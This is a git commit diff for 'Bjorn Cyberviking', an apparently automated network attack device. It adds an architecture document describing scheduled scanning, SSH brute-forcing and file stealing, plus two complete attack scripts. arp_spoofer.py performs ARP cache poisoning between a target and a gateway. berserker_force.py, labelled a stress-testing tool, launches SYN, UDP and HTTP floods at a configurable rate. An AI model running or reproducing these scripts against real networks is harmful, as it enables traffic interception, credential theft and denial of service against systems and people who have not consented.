5 Commits

929 changed files with 110901 additions and 9750 deletions

148
ARCHITECTURE.md Normal file
View File

@@ -0,0 +1,148 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
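A rough sketch of this lifecycle is shown below; the class names match the components described in the following sections, but attribute names such as `should_exit` are assumptions rather than the actual `Bjorn.py` code:
```python
# Hypothetical sketch of the Bjorn.py startup sequence (illustrative only).
import threading
import time

def main(shared_data, Display, WebApp, Orchestrator, is_network_connected):
    # 1-3. Start the display and web server threads.
    threading.Thread(target=Display(shared_data).run, name="display", daemon=True).start()
    threading.Thread(target=WebApp(shared_data).serve_forever, name="webapp", daemon=True).start()

    # 4. Network monitor: start or pause the Orchestrator depending on connectivity.
    orch_thread = None
    while not shared_data.should_exit:                      # assumed stop flag
        if is_network_connected():
            if orch_thread is None or not orch_thread.is_alive():
                orch_thread = threading.Thread(target=Orchestrator(shared_data).run,
                                               name="orchestrator")
                orch_thread.start()
        else:
            shared_data.orchestrator_should_exit = True     # pause when the network drops
        time.sleep(10)
```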
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
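A minimal sketch of what such a shared-state container might look like (field names beyond those mentioned above, and the import path, are assumptions, not the actual `shared.py`):
```python
# Illustrative sketch of a SharedData-style container.
import threading

class SharedData:
    _db = None
    _db_lock = threading.Lock()

    def __init__(self):
        self.config = {}                    # configuration loaded from the DB
        self.bjorn_orch_status = "IDLE"     # runtime status shown on the screen
        self.bjorn_status_text2 = ""
        self.wifi_connected = False
        self.bluetooth_active = False       # indicator names are assumptions
        self.battery_level = None
        self.fonts = {}                     # resources preloaded into RAM
        self.images = {}

    @property
    def db(self):
        # Lazy, thread-safe singleton so every thread shares one BjornDatabase handle.
        with SharedData._db_lock:
            if SharedData._db is None:
                from database import BjornDatabase   # assumed import path
                SharedData._db = BjornDatabase()
            return SharedData._db
```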
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
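Conceptually, the facade could delegate like this (a sketch only; the schema and method names besides `HostOps`, `QueueOps`, and `VulnerabilityOps` are assumptions):
```python
# Illustrative facade sketch for database.py.
import sqlite3
import threading

class HostOps:
    """Host-related queries; kept in db_utils/ in the real project."""
    def __init__(self, db):
        self.db = db
    def get_all_hosts(self):
        return self.db.execute("SELECT * FROM hosts").fetchall()

class BjornDatabase:
    def __init__(self, path="data/bjorn.db"):
        self._conn = sqlite3.connect(path, check_same_thread=False)
        self._lock = threading.Lock()
        self.hosts = HostOps(self)   # QueueOps, VulnerabilityOps, ... follow the same pattern

    def execute(self, sql, params=()):
        # Serialize access so the threads sharing the singleton do not collide.
        with self._lock:
            cur = self._conn.execute(sql, params)
            self._conn.commit()
            return cur
```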
-----
## 3. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
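A simplified sketch of this trigger loop follows; the `action_queue` table and `pending` status come from the description above, while the other table and column names are assumptions:
```python
# Illustrative scheduler loop (not the real action_scheduler.py).
import time

def scheduler_loop(db, actions, should_exit):
    """actions: list of (action_name, trigger) pairs, e.g. ("SSHBruteforce", "on_open_port:22")."""
    while not should_exit():
        for name, trigger in actions:
            if trigger.startswith("on_open_port:"):
                port = int(trigger.split(":", 1)[1])
                hosts = db.execute(
                    "SELECT ip FROM hosts WHERE ports LIKE ?", (f"%{port}%",)
                ).fetchall()
                for (ip,) in hosts:
                    # Avoid duplicates: only queue if no pending entry exists already.
                    dup = db.execute(
                        "SELECT 1 FROM action_queue WHERE action=? AND ip=? AND status='pending'",
                        (name, ip),
                    ).fetchone()
                    if not dup:
                        db.execute(
                            "INSERT INTO action_queue(action, ip, port, status) VALUES(?,?,?,'pending')",
                            (name, ip, port),
                        )
        time.sleep(60)  # re-evaluate triggers periodically
```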
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not make strategic decisions.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
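A minimal sketch of this consumption step, assuming each action module exposes a `b_class` attribute naming its main class and an `execute(ip, port, row, status_key)` method (as the modules under `/actions` do); the `action_queue` column names are assumptions:
```python
# Illustrative consumer step (not the real orchestrator.py).
import importlib

def run_next_action(db, shared_data):
    row = db.execute(
        "SELECT id, action, ip, port FROM action_queue "
        "WHERE status='pending' ORDER BY priority DESC LIMIT 1"
    ).fetchone()
    if row is None:
        return
    action_id, module_name, ip, port = row

    # Dynamically load the action module from /actions and instantiate its main class.
    module = importlib.import_module(f"actions.{module_name}")
    action_cls = getattr(module, module.b_class)        # e.g. b_class = "FTPBruteforce"
    action = action_cls(shared_data)

    result = action.execute(ip, port, row, status_key=module_name)
    db.execute("UPDATE action_queue SET status=? WHERE id=?",
               ("success" if result == "success" else "failed", action_id))
    shared_data.bjorn_orch_status = "IDLE"               # reflected on the e-paper screen
```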
-----
## 4. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
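A rough sketch of the composition step with PIL (the screen dimensions, asset keys, and `comment_text` attribute are placeholders, not the actual `display.py`):
```python
# Illustrative frame composition for the e-paper display.
from PIL import Image, ImageDraw, ImageFont

def render_frame(shared_data, width=122, height=250):
    frame = Image.new("1", (width, height), 255)      # 1-bit canvas for the e-paper panel
    draw = ImageDraw.Draw(frame)

    # Bjorn's face, chosen from preloaded images according to the current status.
    face = shared_data.images.get(shared_data.bjorn_orch_status)
    if face is not None:
        frame.paste(face, (0, 0))

    # Statistics (skulls, lightning bolts, coins) would be pasted here in the real code.

    font = shared_data.fonts.get("small") or ImageFont.load_default()
    draw.text((2, height - 30), shared_data.bjorn_status_text2, font=font, fill=0)
    draw.text((2, height - 15), getattr(shared_data, "comment_text", ""), font=font, fill=0)
    return frame
```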
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy frameworks like Flask/Django, keeping the footprint small).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
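A minimal sketch of such a framework-free threaded server (the `/api/` routing convention and the `WebUtils` method names are assumptions):
```python
# Illustrative threaded JSON API server (not the real webapp.py).
import json
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

class Handler(BaseHTTPRequestHandler):
    web_utils = None                     # set to a WebUtils instance before serving

    def do_GET(self):
        if self.path.startswith("/api/"):
            # Route "/api/get_hosts" to a WebUtils method of the same name (assumed convention).
            method = getattr(self.web_utils, self.path[len("/api/"):], None)
            payload = method() if callable(method) else {"error": "unknown endpoint"}
            body = json.dumps(payload).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_error(404)

# Example: ThreadingHTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
```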
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
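The weighting and delay idea could look roughly like this (phrase storage and field names are assumptions, not the actual `comment.py`):
```python
# Illustrative weighted phrase picker with a cooldown.
import random
import time

class Commentator:
    def __init__(self, phrases, delay=30):
        # phrases: {status: [(text, weight), ...]}, e.g. loaded from the DB per language
        self.phrases = phrases
        self.delay = delay
        self._last_time = 0.0
        self._last_text = ""

    def get_comment(self, status):
        now = time.time()
        if now - self._last_time < self.delay:
            return self._last_text               # avoid spamming: reuse the last phrase
        candidates = self.phrases.get(status, [("...", 1)])
        texts, weights = zip(*candidates)
        self._last_text = random.choices(texts, weights=weights, k=1)[0]
        self._last_time = now
        return self._last_text
```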
-----
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
-----
## 6. Folder Structure
The architecture implies the following repository layout:
```text
/
├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
-----

View File

@@ -1,26 +1,11 @@
# bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py
import threading
import signal
import logging
import time
import sys
import subprocess
import re
from init_shared import shared_data
from display import Display, handle_exit_display
from comment import Commentaireia
@@ -37,6 +22,9 @@ class Bjorn:
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None  # Keep track of the previous network state
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
@@ -51,11 +39,9 @@ class Bjorn:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
@@ -65,7 +51,8 @@ class Bjorn:
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
self.is_network_connected() # Re-check network connectivity before starting the orchestrator
# time.sleep(10) # Wait for network to stabilize
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
@@ -78,7 +65,7 @@ class Bjorn:
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
pass
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
@@ -89,17 +76,47 @@ class Bjorn:
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
def is_network_connected(self):
"""Checks for network connectivity on eth0 or wlan0 using ip command (replacing deprecated ifconfig)."""
logger = logging.getLogger("Bjorn.py")
def interface_has_ip(interface_name):
try:
# Use 'ip -4 addr show <interface>' to check for IPv4 address
result = subprocess.run(
['ip', '-4', 'addr', 'show', interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
return False
# Check if output contains "inet" which indicates an IP address
return 'inet' in result.stdout
except Exception:
return False
eth_connected = interface_has_ip('eth0')
wifi_connected = interface_has_ip('wlan0')
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network is connected (eth0={eth_connected}, wlan0={wifi_connected}).")
else:
logger.warning("No active network connections found.")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
@@ -124,9 +141,7 @@ def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
sys.exit(0)
if __name__ == "__main__":
logger.info("Starting threads")

View File

@@ -42,6 +42,8 @@ The e-Paper HAT display and web interface make it easy to monitor and interact w
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started

1237
action_scheduler.py Normal file

File diff suppressed because it is too large.

View File

@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

(Binary image files added in this commit; contents not shown. Sizes range from 19 KiB to 2.2 MiB.)

163
actions/arp_spoofer.py Normal file
View File

@@ -0,0 +1,163 @@
# ARP spoofer that poisons the ARP cache of a target and a gateway.
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value).
# -g, --gateway IP address of the gateway (overrides saved value).
# -i, --interface Network interface (default: primary or saved).
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
# - Subsequent: python arpspoofer.py (uses saved settings).
# - Update: Provide any argument to override saved values.
import os
import json
import time
import argparse
from scapy.all import ARP, send, sr1, conf
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay):
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
def get_mac(self, ip):
"""Gets the MAC address of a target IP by sending an ARP request."""
print(f"Retrieving MAC address for IP: {ip}")
try:
arp_request = ARP(pdst=ip)
response = sr1(arp_request, timeout=2, verbose=False)
if response:
print(f"MAC address found for {ip}: {response.hwsrc}")
return response.hwsrc
else:
print(f"No ARP response received for IP {ip}")
return None
except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}")
return None
def spoof(self, target_ip, spoof_ip):
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
target_mac = self.get_mac(target_ip)
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
send(arp_response, verbose=False)
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
except Exception as e:
print(f"Error sending ARP packet to {target_ip}: {e}")
def restore(self, target_ip, spoof_ip):
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
target_mac = self.get_mac(target_ip)
gateway_mac = self.get_mac(spoof_ip)
if not target_mac or not gateway_mac:
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
return
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
send(arp_response, verbose=False, count=5)
print(f"ARP association restored between {spoof_ip} and {target_mac}")
except Exception as e:
print(f"Error restoring ARP association for {target_ip}: {e}")
def execute(self):
"""Executes the ARP spoofing attack."""
try:
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")
while True:
target_mac = self.get_mac(self.target_ip)
gateway_mac = self.get_mac(self.gateway_ip)
if not target_mac or not gateway_mac:
print(f"Error retrieving MAC addresses, stopping ARP Spoofing")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
break
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
self.spoof(self.target_ip, self.gateway_ip)
self.spoof(self.gateway_ip, self.target_ip)
time.sleep(self.delay)
except KeyboardInterrupt:
print("Attack interrupted. Restoring ARP tables.")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
print("ARP Spoofing stopped and ARP tables restored.")
except Exception as e:
print(f"Unexpected error during ARP Spoofing attack: {e}")
def save_settings(target, gateway, interface, delay):
"""Saves the ARP spoofing settings to a JSON file."""
try:
os.makedirs(SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"gateway": gateway,
"interface": interface,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as file:
json.dump(settings, file)
print(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
print(f"Failed to save settings: {e}")
def load_settings():
"""Loads the ARP spoofing settings from a JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as file:
return json.load(file)
except Exception as e:
print(f"Failed to load settings: {e}")
return {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
parser.add_argument("-t", "--target", help="IP address of the target device")
parser.add_argument("-g", "--gateway", help="IP address of the gateway")
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
args = parser.parse_args()
# Load saved settings and override with CLI arguments
settings = load_settings()
target_ip = args.target or settings.get("target")
gateway_ip = args.gateway or settings.get("gateway")
interface = args.interface or settings.get("interface")
delay = args.delay or settings.get("delay")
if not target_ip or not gateway_ip:
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
exit(1)
# Save the settings for future use
save_settings(target_ip, gateway_ip, interface, delay)
# Execute the attack
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
spoof.execute()

315
actions/berserker_force.py Normal file
View File

@@ -0,0 +1,315 @@
# Resource exhaustion testing tool for network and service stress analysis.
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to test.
# -p, --ports Ports to test (comma-separated, default: common ports).
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed).
# -r, --rate Packets per second (default: 100).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress).
import os
import json
import argparse
from datetime import datetime
import logging
import threading
import time
import queue
import socket
import random
import requests
from scapy.all import *
import psutil
from collections import defaultdict
b_class = "BerserkerForce"
b_module = "berserker_force"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]
class BerserkerForce:
def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.mode = mode
self.rate = rate
self.output_dir = output_dir
self.active = False
self.lock = threading.Lock()
self.packet_queue = queue.Queue()
self.stats = defaultdict(int)
self.start_time = None
self.target_resources = {}
def monitor_target(self):
"""Monitor target's response times and availability."""
while self.active:
try:
for port in self.ports:
try:
start_time = time.time()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
result = s.connect_ex((self.target, port))
response_time = time.time() - start_time
with self.lock:
self.target_resources[port] = {
'status': 'open' if result == 0 else 'closed',
'response_time': response_time
}
except:
with self.lock:
self.target_resources[port] = {
'status': 'error',
'response_time': None
}
time.sleep(1)
except Exception as e:
logging.error(f"Error monitoring target: {e}")
def syn_flood(self):
"""Generate SYN flood packets."""
while self.active:
try:
for port in self.ports:
packet = IP(dst=self.target)/TCP(dport=port, flags="S",
seq=random.randint(0, 65535))
self.packet_queue.put(('syn', packet))
with self.lock:
self.stats['syn_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in SYN flood: {e}")
def udp_flood(self):
"""Generate UDP flood packets."""
while self.active:
try:
for port in self.ports:
data = os.urandom(1024) # Random payload
packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
self.packet_queue.put(('udp', packet))
with self.lock:
self.stats['udp_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in UDP flood: {e}")
def http_flood(self):
"""Generate HTTP flood requests."""
while self.active:
try:
for port in [80, 443]:
if port in self.ports:
protocol = 'https' if port == 443 else 'http'
url = f"{protocol}://{self.target}"
# Randomize request type
request_type = random.choice(['get', 'post', 'head'])
try:
if request_type == 'get':
requests.get(url, timeout=1)
elif request_type == 'post':
requests.post(url, data=os.urandom(1024), timeout=1)
else:
requests.head(url, timeout=1)
with self.lock:
self.stats['http_requests'] += 1
except:
with self.lock:
self.stats['http_errors'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in HTTP flood: {e}")
def packet_sender(self):
"""Send packets from the queue."""
while self.active:
try:
if not self.packet_queue.empty():
packet_type, packet = self.packet_queue.get()
send(packet, verbose=False)
with self.lock:
self.stats['packets_sent'] += 1
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def calculate_statistics(self):
"""Calculate and update testing statistics."""
duration = time.time() - self.start_time
stats = {
'duration': duration,
'packets_per_second': self.stats['packets_sent'] / duration,
'total_packets': self.stats['packets_sent'],
'syn_packets': self.stats['syn_packets'],
'udp_packets': self.stats['udp_packets'],
'http_requests': self.stats['http_requests'],
'http_errors': self.stats['http_errors'],
'target_resources': self.target_resources
}
return stats
def save_results(self):
"""Save test results and statistics."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'configuration': {
'target': self.target,
'ports': self.ports,
'mode': self.mode,
'rate': self.rate
},
'statistics': self.calculate_statistics()
}
output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def start(self):
"""Start stress testing."""
self.active = True
self.start_time = time.time()
threads = []
# Start monitoring thread
monitor_thread = threading.Thread(target=self.monitor_target)
monitor_thread.start()
threads.append(monitor_thread)
# Start sender thread
sender_thread = threading.Thread(target=self.packet_sender)
sender_thread.start()
threads.append(sender_thread)
# Start attack threads based on mode
if self.mode in ['syn', 'mixed']:
syn_thread = threading.Thread(target=self.syn_flood)
syn_thread.start()
threads.append(syn_thread)
if self.mode in ['udp', 'mixed']:
udp_thread = threading.Thread(target=self.udp_flood)
udp_thread.start()
threads.append(udp_thread)
if self.mode in ['http', 'mixed']:
http_thread = threading.Thread(target=self.http_flood)
http_thread.start()
threads.append(http_thread)
return threads
def stop(self):
"""Stop stress testing."""
self.active = False
self.save_results()
def save_settings(target, ports, mode, rate, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"mode": mode,
"rate": rate,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Resource exhaustion testing tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)")
parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
default='mixed', help="Test mode")
parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
mode = args.mode or settings.get("mode")
rate = args.rate or settings.get("rate")
output_dir = args.output or settings.get("output_dir")
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, mode, rate, output_dir)
berserker = BerserkerForce(
target=target,
ports=ports,
mode=mode,
rate=rate,
output_dir=output_dir
)
try:
threads = berserker.start()
logging.info(f"Stress testing started against {target}")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping stress test...")
berserker.stop()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()

234
actions/demo_action.py Normal file
View File

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
